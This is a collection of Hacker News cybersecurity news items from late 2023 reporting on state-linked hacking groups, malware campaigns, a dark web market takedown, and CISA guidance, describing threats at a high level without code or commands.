BigBrothers 2024 2023 2022 2021 2020
German Authorities Dismantle Dark Web Hub 'Kingdom Market' in Global Operation
23.12.23 BigBrothers The Hacker News
German law enforcement has announced the disruption of a dark web platform called Kingdom Market that specialized in the sales of narcotics and malware to "tens of thousands of users."
The exercise, which involved collaboration from authorities from the U.S., Switzerland, Moldova, and Ukraine, began on December 16, 2023, the Federal Criminal Police Office (BKA) said.
Kingdom Market is said to have been accessible over the TOR and Invisible Internet Project (I2P) anonymization networks since at least March 2021, trafficking in illegal narcotics as well as advertising malware, criminal services, and forged documents.
As many as 42,000 products have been sold via several hundred seller accounts on the English language platform prior to its takedown, with 3,600 of them originating from Germany.
Transactions on the Kingdom Market were facilitated through cryptocurrency payments in the form of Bitcoin, Litecoin, Monero, and Zcash, with the website operators receiving a 3% commission for processing the sales of the illicit goods.
"The operators of 'Kingdom Market' are suspected of commercially operating a criminal trading platform on the Internet and of illicit trafficking in narcotics," the BKA said, adding an investigation into the seized server infrastructure is ongoing.
In addition to the seizure, one person connected to the running of Kingdom Market has been charged in the U.S. with identity theft and money laundering. Alan Bill, who also goes by the aliases Vend0r and KingdomOfficial, has been described as a Slovakian national.
The development comes days after another coordinated law enforcement effort saw the dismantling of the BlackCat ransomware's dark web infrastructure, prompting the group to respond to the seizure of its data leak site by wresting control of the page, claiming they had "unseized" it.
Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa
19.12.23 BigBrothers The Hacker News
The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania.
The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.
Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East.
The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020.
While the full extent of MuddyC2Go's capabilities is not yet known, the executable comes fitted with a PowerShell script that automatically connects to Seedworm's C2 server, thereby giving the attackers remote access to a victim system and obviating the need for manual execution by an operator.
The latest set of intrusions, which took place in November 2023, have also been found to rely on SimpleHelp and Venom Proxy, alongside a custom keylogger and other publicly available tools.
Attack chains mounted by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.
In the attacks documented by Symantec targeting an unnamed telecommunications organization, the MuddyC2Go launcher was executed to establish contact with an actor-controlled server, while also deploying legitimate remote access software like AnyDesk and SimpleHelp.
The entity is said to have been previously compromised by the adversary earlier in 2023 in which SimpleHelp was used to launch PowerShell, deliver proxy software, and also install the JumpCloud remote access tool.
"In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure," Symantec noted. "A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity."
By utilizing a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains, the goal is to evade detection for as long as possible to meet its strategic objectives, the company said.
"The group continues to innovate and develop its toolset when required in order to keep its activity under the radar," Symantec concluded. "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks."
The development comes as an Israel-linked group called Gonjeshke Darande (meaning "Predatory Sparrow" in Persian) claimed responsibility for a cyber attack that disrupted a "majority of the gas pumps throughout Iran" in response to the "aggression of the Islamic Republic and its proxies in the region."
The group, which reemerged in October 2023 after going quiet for nearly a year, is believed to be linked to the Israeli Military Intelligence Directorate, having conducted destructive attacks in Iran, including steel facilities, petrol stations, and rail networks in the country.
CISA Urges Manufacturers Eliminate Default Passwords to Thwart Cyber Threats
19.12.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations.
In an alert published last week, the agency called out Iranian threat actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) for exploiting operational technology devices with default passwords to gain access to critical infrastructure systems in the U.S.
Default passwords refer to factory default software configurations for embedded systems, devices, and appliances that are typically publicly documented and identical among all systems within a vendor's product line.
As a result, threat actors could scan for internet-exposed endpoints using tools like Shodan and attempt to breach them through default passwords, often gaining root or administrative privileges to perform post-exploitation actions depending on the type of the system.
"Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary," MITRE notes.
Earlier this month, CISA revealed that IRGC-affiliated cyber actors using the persona Cyber Av3ngers are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) that are publicly exposed to the internet through the use of default passwords ("1111").
"In these attacks, the default password was widely known and publicized on open forums where threat actors are known to mine intelligence for use in breaching U.S. systems," the agency added.
As mitigation measures, manufacturers are being urged to follow secure by design principles and provide unique setup passwords with the product, or alternatively disable such passwords after a preset time period and require users to enable phishing-resistant multi-factor authentication (MFA) methods.
The agency further advised vendors to conduct field tests to determine how their customers are deploying the products within their environments and if they involve the use of any unsafe mechanisms.
"Analysis of these field tests will help bridge the gap between developer expectations and actual customer usage of the product," CISA noted in its guidance.
"It will also help identify ways to build the product so customers will be most likely to securely use it—manufacturers should ensure that the easiest route is the secure one."
The disclosure comes as the Israel National Cyber Directorate (INCD) attributed a Lebanese threat actor with connections to the Iranian Ministry of Intelligence for orchestrating cyber attacks targeting critical infrastructure in the country amidst its ongoing war with Hamas since October 2023.
The attacks, which involve the exploitation of known security flaws (e.g., CVE-2018-13379) to obtain sensitive information and deploy destructive malware, have been tied to an attack group named Plaid Rain (formerly Polonium).
The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise -
Enforce strong passwords and phishing-resistant MFA
Ensure that only ports, protocols, and services with validated business needs are running on each system
Configure Service accounts with only the permissions necessary for the services they operate
Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems
Discontinue reuse or sharing of administrative credentials among user/administrative accounts
Mandate consistent patch management
Implement network segregation controls
Evaluate the use of unsupported hardware and software and discontinue where possible
Encrypt personally identifiable information (PII) and other sensitive data
On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes.
"Organizations that do not follow a consistent and secure-by-design management practice for the open-source software they utilize are more likely to become vulnerable to known exploits in open-source packages and encounter more difficulty when reacting to an incident," said Aeva Black, open-source software security lead at CISA.
New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities
14.12.23 BigBrothers The Hacker News
A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.
The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.
"Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.
Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.
Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.
The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.
In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.
The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.
Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.
Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the "commands used to communicate with the [command-and-control] servers and other strings in the binary are written in Ukrainian."
"The backdoor may have been obtained in underground communities rather than home-grown," it assessed at the time.
Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.
SentinelOne's investigation into Gaza Cyber Gang's operations have also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.
The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.
"The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process," Milenkoski said.
"This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors."
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
14.12.23 BigBrothers The Hacker News
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel.
The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k).
"These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News.
By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructure.
Some of the targets of the campaign include an organization in the healthcare sector, a manufacturing company, and a local governmental organization, among others. All the victims are said to have been previously targeted by the threat actor.
The exact initial access vector used to compromise the targets is currently unclear and it's not known if the attackers managed to retain their foothold in the networks so as to deploy these downloaders at various points of time in 2022.
OilRig, also known as APT34, Crambus, Cobalt Gypsy, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber espionage group that's known to be active since at least 2014, using a wide range of malware at its disposal to target entities in the Middle East.
This year alone, the hacking crew has been observed leveraging novel malware like MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah.
ODAgent, first detected in February 2022, is a C#/.NET downloader that utilizes Microsoft OneDrive API for command-and-control (C2) communications, allowing the threat actor to download and execute payloads, and exfiltrate staged files.
SampleCheck5000, on the other hand, is designed to interact with a shared Microsoft Exchange mail account to download and execute additional OilRig tools using the Office Exchange Web Services (EWS) API.
OilBooster, in the same way as ODAgent, uses Microsoft OneDrive API for C2, whereas OilCheck adopts the same technique as SampleCheck5000 to extract commands embedded in draft messages. But instead of using the EWS API, it leverages Microsoft Graph API for network communications.
OilBooster is also similar to OilCheck in that it employs the Microsoft Graph API to connect to a Microsoft Office 365 account. What's different this time around is that the API is used to interact with an actor-controlled OneDrive account as opposed to an Outlook account in order to fetch commands and payloads from victim-specific folders.
These tools also share similarities with MrPerfectionManager and PowerExchange backdoors when it comes to using email-based C2 protocols to exfiltrate data, although in the case of the latter, the victimized organization's Exchange Server is used to send messages to the attacker's email account.
"In all cases, the downloaders use a shared (email or cloud storage) OilRig-operated account to exchange messages with the OilRig operators; the same account is typically shared by multiple victims," the researchers explained.
"The downloaders access this account to download commands and additional payloads staged by the operators, and to upload command output and staged files."
Major Cyber Attack Paralyzes Kyivstar - Ukraine's Largest Telecom Operator
13.12.23 BigBrothers The Hacker News
Ukraine's biggest telecom operator Kyivstar has become the victim of a "powerful hacker attack," disrupting customer access to mobile and internet services.
"The cyberattack on Ukraine's #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues to restore connectivity," NetBlocks said in a series of posts on X (formerly Twitter).
Kyivstar, which is owned by Dutch-domiciled multinational telecommunication services company VEON, serves nearly 25 million mobile subscribers and more than 1 million home internet customers.
The company said the attack was "a result of" the war with Russia and that it has notified law enforcement and special state services. While Kyivstar is working to restore the services, the internet watchdog noted that the telco is largely offline.
That said, Kyivstar has yet to provide details about the nature of the attacks and what caused the shutdown. There is no evidence that the personal data of subscribers has been compromised in the incident.
"After stabilizing the network, all subscribers and corporate clients who as a result of a hacking attack could not use the services of the company, will definitely receive compensation," Kyivstar said in an update posted on Facebook.
Source: NetBlocks
It's also urging users to be on the lookout for scams aiming to trick users into sharing their personal details and that "news about compensation and the timing of the network restoration will come exclusively from the company's official pages."
The pro-Russia hacktivist group KillNet claimed responsibility for the attack on Telegram, but did not offer any additional evidence to back its claims.
KillNet is coming off a few chaotic weeks of its own after the Russia-based Gazeta.ru unmasked the real-world identity of its leader — who goes by the online alias KillMilk — as Nikolai Serafimov, a 30-year-old Russian citizen.
KillMilk has since announced his retirement, appointing in his place a new head named "Deanon Club," who has claimed that "there will be a large-scale recruitment for the KillNet team, on all fronts" with the goal of striking government financial facilities, encryption firms, and the gambling sector.
The development also comes as the Defence Intelligence of Ukraine (GUR) revealed that it hacked into Russia's Federal Taxation Service (FNS) servers and wiped all its data.. Office.ed-it.ru, a Russian IT company that served as a database for the FNS, was also reportedly affected by the attack.
"During the special operation, military intelligence officers managed to infiltrate one of the well-protected key central servers of the Federal Tax Service (FTS of the Russian Federation), and then more than 2300 of its regional servers throughout Russia, as well as on the territory of the temporarily occupied Crimea," the agency said.
Last month, GUR announced that it was behind a cyber assault against the Russian government's Federal Air Transport Agency (FATA), which is also known as Rosaviatsia. The attack allowed it to access “a large volume of confidential documents,” including a list of daily reports spanning more than a year and a half, it said.
However, Anton Gorelkin, a Russian politician and lawmaker, said in a message on Telegram that the attack on FNS is fiction, adding it is an attempt on part of the Ukrainian government to "respond to their problems with Kyivstar."
Russia's AI-Powered Disinformation Operation Targeting Ukraine, U.S., and Germany
6.12.23 BigBrothers The Hacker News
The Russia-linked influence operation called Doppelganger has targeted Ukrainian, U.S., and German audiences through a combination of inauthentic news sites and social media accounts.
These campaigns are designed to amplify content designed to undermine Ukraine as well as propagate anti-LGBTQ+ sentiment, U.S. military competence, and Germany's economic and social issues, according to a new report shared with The Hacker News.
Doppelganger, described by Meta as the "largest and the most aggressively-persistent Russian-origin operation," is a pro-Russian network known for spreading anti-Ukrainian propaganda. Active since at least February 2022, it has been linked to two companies named Structura National Technologies and Social Design Agency.
Activities associated with the influence operation are known to leverage manufactured websites as well as those impersonating authentic media – a technique called brandjacking – to disseminate adversarial narratives.
The latest campaigns are also characterized by the use of advanced obfuscation techniques, including "manipulating social media thumbnails and strategic first and second-stage website redirects to evade detection, and the likely use of generative artificial intelligence (AI) to create inauthentic news articles," the cybersecurity firm said.
The findings demonstrate Doppelgänger's evolving tactics and throw light on the use of AI for information warfare and to produce scalable influence content.
The campaign targeting Ukraine is said to consist of more than 800 social media accounts, in addition to banking on first and second-stage domains to conceal the true destination. Some of these links also use the Keitaro Traffic Distribution System (TDS) to assess the overall success and effectiveness of the campaign.
One of the notable aspects of the U.S. and German campaigns is the use of inauthentic media outlets such as Election Watch, MyPride, Warfare Insider, Besuchszweck, Grenzezank, and Haüyne Scherben that publish malign content as original news and opinion outlets.
"Doppelgänger exemplifies the enduring, scalable, and adaptable nature of Russian information warfare, demonstrating strategic patience aimed at gradually shifting public opinion and behavior," Recorded Future said.
It's worth pointing out that Meta, in its quarterly Adversarial Threat Report published last week, said it also found a new cluster of websites linked to Doppelganger that are geared towards U.S. and European political affairs, such as migration and border security.
"Their latest web content appears to have been copy-pasted from mainstream U.S. news outlets and altered to question U.S. democracy and promote conspiratorial themes," Meta said, highlighting Election Watch as one of the U.S.-focused sites.
"Soon after the Hamas terrorist attack in Israel [in October 2023], we saw these websites begin posting about the crisis in the Middle East as a proof of American decline; and at least one website claimed Ukraine supplied Hamas with weapons."
Meta also said it took steps to disrupt three separate covert influence operations – two from China and one from Russia – during the third quarter of 2023 that leveraged fictitious personas and media brands to target audiences in India and the U.S., and share content about Russia's invasion of Ukraine.
It, however, noted that proactive threat sharing by the federal government in the U.S. related to foreign election interference has been paused since July 2023, cutting off a key source of information that could be valuable to disrupt malicious foreign campaigns by sophisticated threat actors.
New Threat Actor 'AeroBlade' Emerges in Espionage Attack on U.S. Aerospace
5.12.23 BigBrothers The Hacker News
A previously undocumented threat actor has been linked to a cyber attack targeting an aerospace organization in the U.S. as part of what's suspected to be a cyber espionage mission.
The BlackBerry Threat Research and Intelligence team is tracking the activity cluster as AeroBlade. Its origin is currently unknown and it's not clear if the attack was successful.
"The actor used spear-phishing as a delivery mechanism: A weaponized document, sent as an email attachment, contains an embedded remote template injection technique and a malicious VBA macro code, to deliver the next stage to the final payload execution," the company said in an analysis published last week.
The network infrastructure used for the attack is said to have gone live around September 2022, with the offensive phase of the intrusion occurring nearly a year later in July 2023, but not before the adversary took steps to improvise its toolset to make it more stealthy in the intervening time period.
The initial attack, which took place in September 2022, commenced with a phishing email bearing a Microsoft Word attachment that, when opened, used a technique called remote template injection to retrieve a next-stage payload that's executed after the victim enables macros.
The attack chain ultimately led to the deployment of a dynamic-link library (DLL) that functions as a reverse shell, connecting to a hard-coded command-and-control (C2) server and transmitting system information to the attackers.
The information gathering capabilities also include enumerating the complete list of directories on the infected host, indicating that this could be a reconnaissance effort carried out to see if the machine hosts any valuable data and aid its operators in strategizing their next steps.
"Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the device," Dmitry Bestuzhev, senior director of cyber threat intelligence at BlackBerry, said. "It is therefore a severe security threat."
The heavily obfuscated DLL also comes fitted with anti-analysis and anti-disassembly techniques to make it challenging to detect and take apart, while also skipping execution on sandboxed environments. Persistence is accomplished by means of a Task Scheduler, in which a task named "WinUpdate2" is created to run every day at 10:10 a.m.
"During the time that elapsed between the two campaigns we observed, the threat actor put considerable effort into developing additional resources to ensure they could secure access to the sought-after information, and that they could exfiltrate it successfully," Bestuzhev said.
U.S. Treasury Sanctions North Korean Kimsuky Hackers and 8 Foreign-Based Agents
1.12.23 BigBrothers The Hacker News
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) on Thursday sanctioned the North Korea-linked adversarial collective known as Kimsuky as well as eight foreign-based agents who are alleged to have facilitated sanctions evasion.
The agents, the Treasury said, helped in "revenue generation and missile-related technology procurement that support the DPRK's weapons of mass destruction (WMD) programs."
The sanctions against Kimsuky, which have been levied for gathering intelligence to support the regime's strategic objectives, come more than four years after the OFAC imposed similar measures against the Lazarus Group and its offshoots Andariel and BlueNoroff in September 2019.
The actions are in response to North Korea's launch of a military reconnaissance satellite late last month, the Treasury added. They also arrive a day after a virtual currency mixer service called Sinbad was sanctioned for processing stolen assets linked to hacks perpetrated by the Lazarus Group.
Kimsuky – also called APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima – is a prolific cyber espionage crew that primarily targets governments, nuclear organizations, and foreign relations entities to collect intelligence that help further North Korea's interests.
"The group combines moderately sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues," Google-owned Mandiant noted in October 2023.
Like the Lazarus Group, it's also an element within the Reconnaissance General Bureau (RGB), which is North Korea's primary foreign intelligence service that's responsible for intelligence collection operations. It's known to be active since at least 2012.
"Kimsuky employs social engineering to collect intelligence on geopolitical events, foreign policy strategies, and diplomatic efforts affecting its interests by gaining illicit access to the private documents, research, and communications of their targets," the Treasury said.
The agency also identified Kang Kyong Il, Ri Sung Il, and Kang Phyong Guk for acting as weapons sales representatives; So Myong, Choe Un Hyok, and Jang Myong Chol for engaging in illicit financial transfers to procure material for North Korea's missile programs; and Choe Song Chol and Im Song Sun for running front companies involved in generating revenue by exporting skilled workers.
"The geographic breakdown of North Korean threat groups' targeting in the cryptocurrency industry [follows a multi-pronged approach], where Kimsuky has been seen targeting the cryptocurrency industry in South Korea, and Lazarus Group has a more global presence in their cryptocurrency targeting operations," Recorded Future said in a new report published this week.
Hamas-Linked Cyberattacks Using Rust-Powered SysJoker Backdoor Against Israel
25.11.23 BigBrothers The Hacker News
Cybersecurity researchers have shed light on a Rust version of a cross-platform backdoor called SysJoker, which is assessed to have been used by a Hamas-affiliated threat actor to target Israel amid the ongoing war in the region.
"Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities," Check Point said in a Wednesday analysis. "In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command-and-control server) URLs."
SysJoker was publicly documented by Intezer in January 2022, describing it as a backdoor capable of gathering system information and establishing contact with an attacker-controlled server by accessing a text file hosted on Google Drive that contains a hard-coded URL.
"Being cross-platform allows the malware authors to gain advantage of wide infection on all major platforms," VMware said last year. "SysJoker has the ability to execute commands remotely as well as download and execute new malware on victim machines."
The discovery of a Rust variant of SysJoker points to an evolution of the cross-platform threat, with the implant employing random sleep intervals at various stages of its execution, likely in an effort to evade sandboxes.
One noteworthy shift is the use of OneDrive to retrieve the encrypted and encoded C2 server address, which is subsequently parsed to extract the IP address and port to be used.
"Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services," Check Point said. "This behavior remains consistent across different versions of SysJoker."
After establishing connections with the server, the artifact awaits further additional payloads that are then executed on the compromised host.
The cybersecurity company said it also discovered two never-before-seen SysJoker samples designed for Windows that are significantly more complex, one of which utilizing a multi-stage execution process to launch the malware.
SysJoker has not yet been formally attributed to any threat actor or group. But newly gathered evidence shows overlaps between the backdoor and malware samples used in connection with Operation Electric Powder, which refers to a targeted campaign against Israeli organizations between April 2016 and February 2017.
This activity was linked by McAfee to a Hamas-affiliated threat actor known as Molerats (aka Extreme Jackal, Gaza Cyber Gang, and TA402).
"Both campaigns used API-themed URLs and implemented script commands in a similar fashion," Check Point noted, raising the possibility that "the same actor is responsible for both attacks, despite the large time gap between the operations."
Mustang Panda Hackers Targets Philippines Government Amid South China Sea Tensions
21.11.23 BigBrothers The Hacker News
The China-linked Mustang Panda actor has been linked to a cyber attack targeting a Philippines government entity amid rising tensions between the two countries over the disputed South China Sea.
Palo Alto Networks Unit 42 attributed the adversarial collective to three campaigns in August 2023, primarily singling out organizations in the South Pacific.
"The campaigns leveraged legitimate software including Solid PDF Creator and SmadavProtect (an Indonesian-based antivirus solution) to sideload malicious files," the company said.
"Threat authors also creatively configured the malware to impersonate legitimate Microsoft traffic for command and control (C2) connections."
Mustang Panda, also tracked under the names Bronze President, Camaro Dragon, Earth Preta, RedDelta, and Stately Taurus, is assessed to be a Chinese advanced persistent threat (APT) active since at least 2012, orchestrating cyber espionage campaigns targeting non-governmental organizations (NGOs) and government bodies across North America, Europe, and Asia.
In late September 2023, Unit 42 also implicated the threat actor to attacks aimed at an unnamed Southeast Asian government to distribute a variant of a backdoor called TONESHELL.
The latest campaigns leverage spear-phishing emails to deliver a malicious ZIP archive file that contains a rogue dynamic-link library (DLL) that's launched using a technique called DLL side-loading. The DLL subsequently establishes contact with a remote server.
It's assessed that the Philippines government entity was likely compromised over a five-day period between August 10 and 15, 2023.
The use of SmadavProtect is a known tactic adopted by Mustang Panda in recent months, having deployed malware expressly designed to bypass the security solution.
"Stately Taurus continues to demonstrate its ability to conduct persistent cyberespionage operations as one of the most active Chinese APTs," the researchers said.
"These operations target a variety of entities globally that align with geopolitical topics of interest to the Chinese government."
The disclosure comes as a South Korean APT actor named Higaisa has been uncovered targeting Chinese users through phishing websites mimicking well-known software applications such as OpenVPN.
"Once executed, the installer drops and runs Rust-based malware on the system, subsequently triggering a shellcode," Cyble said late last month. "The shellcode performs anti-debugging and decryption operations. Afterward, it establishes encrypted command-and-control (C&C) communication with a remote Threat Actor (TA)."
Indian Hack-for-Hire Group Targeted U.S., China, and More for Over 10 Years
20.11.23 BigBrothers The Hacker News
An Indian hack-for-hire group targeted the U.S., China, Myanmar, Pakistan, Kuwait, and other countries as part of a wide-ranging espionage, surveillance, and disruptive operation for over a decade.
The Appin Software Security (aka Appin Security Group), according to an in-depth analysis from SentinelOne, began as an educational startup offering offensive security training programs, while carrying out covert hacking operations since at least 2009.
In May 2013, ESET disclosed a set of cyber attacks targeting Pakistan with information-stealing malware. While the activity was attributed to a cluster tracked as Hangover (aka Patchwork or Zinc Emerson), evidence shows that the infrastructure is owned and controlled by Appin.
"The group has conducted hacking operations against high value individuals, governmental organizations, and other businesses involved in specific legal disputes," SentinelOne security Tom Hegel said in a comprehensive analysis published last week.
"Appin's hacking operations and overall organization appear at many times informal, clumsy, and technically crude; however, their operations proved highly successful for their customers, impacting world affairs with significant success."
The findings are based on non-public data obtained by Reuters, which called out Appin for orchestrating data theft attacks on an industrial scale against political leaders, international executives, sports figures, and others. The company, in response, has dismissed its connection with the hack-for-hire business.
One of the core services offered by Appin was a tool "MyCommando" (aka GoldenEye or Commando) that allowed its customers to log in to view and download campaign-specific data and status updates, communicate securely, and choose from various task options that range from open-source research to social engineering to a trojan campaign.
The targeting of China and Pakistan is confirmation that an Indian-origin mercenary group has been roped in to conduct state-sponsored attacks. Appin has also been identified as behind the macOS spyware known as KitM in 2013.
What's more, SentinelOne said it also identified instances of domestic targeting with the goal of stealing login credentials of email accounts belonging to Sikhs in India and the U.S.
"In an unrelated campaign, the group also used the domain speedaccelator[.]com for an FTP server, hosting malware used in their malicious phishing emails, one of which was used on an Indian individual later targeted by the ModifiedElephant APT," Hegel noted. It's worth noting that Patchwork's links to ModifiedElephant were previously identified by Secureworks.
Besides leveraging a large infrastructure sourced from a third-party for data exfiltration, command-and-control (C2), phishing, and setting up decoy sites, the shadowy private-sector offensive actor (PSOA) is said to have relied on private spyware and exploit services provided by private vendors like Vervata, Vupen, and Core Security.
In another noteworthy tactic, Appin is said to have leveraged a California-based freelancing platform referred to as Elance (now called Upwork) to purchase malware from external software developers, while also using its in-house employees to develop a custom collection of hacking tools.
"The research findings underscore the group's remarkable tenacity and a proven track record of successfully executing attacks on behalf of a diverse clientele," Hegel said.
The development comes as Aviram Azari, an Israeli private investigator, was sentenced in the U.S. to nearly seven years in federal prison on charges of computer intrusion, wire fraud, and aggravated identity theft in connection with a global hack-for-hire scheme between November 2014 to September 2019. Azari was arrested in September 2019.
"Azari owned and operated an Israeli intelligence firm," the Department of Justice (DoJ) said last week. "Clients hired Azari to manage 'Projects' that were described as intelligence gathering efforts but were, in fact, hacking campaigns specifically targeting certain groups of victims."
Aviram has also been accused of using mercenary hackers in India, a company called BellTroX Infotech (aka Amanda or Dark Basin), to help clients gain an advantage in court battles via spear-phishing attacks and ultimately gain access to victims' accounts and steal information.
BellTrox was founded by Sumit Gupta in May 2013. Reuters disclosed in June 2022 that prior to launching the company, Gupta had worked for Appin.
U.S. Cybersecurity Agencies Warn of Scattered Spider's Gen Z Cybercrime Ecosystem
17.11.23 BigBrothers The Hacker News
U.S. cybersecurity and intelligence agencies have released a joint advisory about a cybercriminal group known as Scattered Spider that's known to employ sophisticated phishing tactics to infiltrate targets.
"Scattered Spider threat actors typically engage in data theft for extortion using multiple social engineering techniques and have recently leveraged BlackCat/ALPHV ransomware alongside their usual TTPs," the agencies said.
The threat actor, also tracked under the monikers Muddled Libra, Octo Tempest, 0ktapus, Scatter Swine, Star Fraud, and UNC3944, was the subject of an extensive profile from Microsoft last month, with the tech giant calling it "one of the most dangerous financial criminal groups."
Considered as experts in social engineering, Scattered Spider is known to rely on phishing, prompt bombing, and SIM swapping attacks to obtain credentials, install remote access tools, and bypass multi-factor authentication (MFA).
Scattered Spider, like LAPSUS$, is said to be part of a larger Gen Z cybercrime ecosystem that refers to itself as the Com (alternately spelled Comm), which has resorted to violent activity and swatting attacks.
A report from Reuters earlier this week disclosed that the U.S. Federal Bureau of Investigation (FBI) is aware of the identities of at least a dozen members of the cybercrime gang.
One of the notable tricks in its arsenal is the impersonation of IT and helping desk staff use phone calls or SMS messages to target employees and gain elevated access to the networks.
Successful initial access is followed by the deployment of legitimate remote access tunneling tools such as Fleetdeck.io, Ngrok, and Pulseway, as well as remote access trojans and stealers like AveMaria (aka Warzone RAT), Raccoon Stealer, and Vidar Stealer.
Furthermore, the English-speaking extortion crew leverages living-off-the-land (LotL) techniques to skirt detection and navigate compromised networks with an ultimate aim to steal sensitive information in exchange for a payment.
"The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses," the agencies noted.
As of mid-2023, Scattered Spider has also acted as an affiliate for the BlackCat ransomware gang, monetizing its access to victims for extortion-enabled ransomware and data theft.
The U.S. government is urging companies to implement phishing-resistant MFA, enforce a recovery plan, maintain offline backups, and adopt application controls to prevent the execution of unauthorized software on endpoints.
Russian Hackers Linked to 'Largest Ever Cyber Attack' on Danish Critical Infrastructure
16.11.23 BigBrothers The Hacker News
Russian threat actors have been possibly linked to what's been described as the "largest cyber attack against Danish critical infrastructure," in which 22 companies associated with the operation of the country's energy sector were targeted in May 2023.
"22 simultaneous, successful cyberattacks against Danish critical infrastructure are not commonplace," Denmark's SektorCERT said [PDF]. "The attackers knew in advance who they were going to target and got it right every time. Not once did a shot miss the target."
The agency said it found evidence connecting one or more attacks to Russia's GRU military intelligence agency, which is also tracked under the name Sandworm and has a track record of orchestrating disruptive cyber assaults on industrial control systems. This assessment is based on artifacts communicating with IP addresses that have been traced to the hacking crew.
The unprecedented and coordinated cyber attacks took place on May 11 by exploiting CVE-2023-28771 (CVSS score: 9.8), a critical command injection flaw impacting Zyxel firewalls that was disclosed in late April 2023.
